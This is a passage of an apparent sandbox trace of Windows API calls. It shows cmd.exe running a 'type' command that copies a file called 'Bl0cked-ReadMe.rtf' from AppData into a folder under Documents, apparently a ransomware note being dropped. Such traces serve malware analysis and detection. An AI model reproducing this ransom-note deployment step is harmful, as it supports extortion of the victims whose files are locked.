lpData=0x1aea00*=0x0, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x9, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegCloseKey (hKey=0x40) returned 0x0 [0133.283] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.283] srand (_Seed=0x5b886367) [0133.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0133.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0133.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.283] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.284] GetEnvironmentStringsW () returned 0x3a22e8* [0133.284] FreeEnvironmentStringsW (penv=0x3a22e8) returned 1 [0133.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af7c0, lpFilePart=0x1af7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af7bc*="Desktop") returned 0x18 [0133.284] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.284] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0133.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.284] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0133.285] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af53c | out: lpFindFileData=0x1af53c) returned 0x3a0028 [0133.285] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0133.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.285] GetEnvironmentStringsW () returned 0x3a2b08* [0133.285] FreeEnvironmentStringsW (penv=0x3a2b08) returned 1 [0133.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.285] GetConsoleOutputCP () returned 0x1b5 [0133.286] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.286] GetUserDefaultLCID () returned 0x409 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af900, cchData=128 | out: lpLCData="0") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af900, cchData=128 | out: lpLCData="0") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af900, cchData=128 | out: lpLCData="1") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.286] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.287] GetConsoleTitleW (in: lpConsoleTitle=0x3908f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.288] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.288] _wcsicmp (_String1="type", _String2=")") returned 75 [0133.288] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0133.289] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0133.289] _wcsicmp (_String1="IF", _String2="type") returned -11 [0133.289] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0133.289] _wcsicmp (_String1="REM", _String2="type") returned -2 [0133.289] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0133.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.292] GetFileType (hFile=0x7) returned 0x2 [0133.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.292] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af7f8 | out: lpMode=0x1af7f8) returned 1 [0133.293] _dup (_FileHandle=1) returned 3 [0133.293] _close (_FileHandle=1) returned 0 [0133.293] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0133.293] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af7c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0133.294] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0133.294] GetConsoleTitleW (in: lpConsoleTitle=0x1af5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.294] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0133.294] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0133.294] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0133.294] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0133.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.295] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1af15c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af15c) returned 0x390e90 [0133.296] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0133.296] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0133.296] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0133.296] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ae068, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0133.296] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] GetFileType (hFile=0x54) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae0c0 | out: lpFileSizeHigh=0x1ae0c0*=0x0) returned 0x1632 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.296] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] GetFileType (hFile=0x4c) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] GetFileType (hFile=0x4c) returned 0x1 [0133.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.296] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] GetFileType (hFile=0x4c) returned 0x1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] GetFileType (hFile=0x4c) returned 0x1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.297] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.298] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.298] GetFileType (hFile=0x4c) returned 0x1 [0133.298] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.299] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.299] GetFileType (hFile=0x4c) returned 0x1 [0133.299] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.300] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, 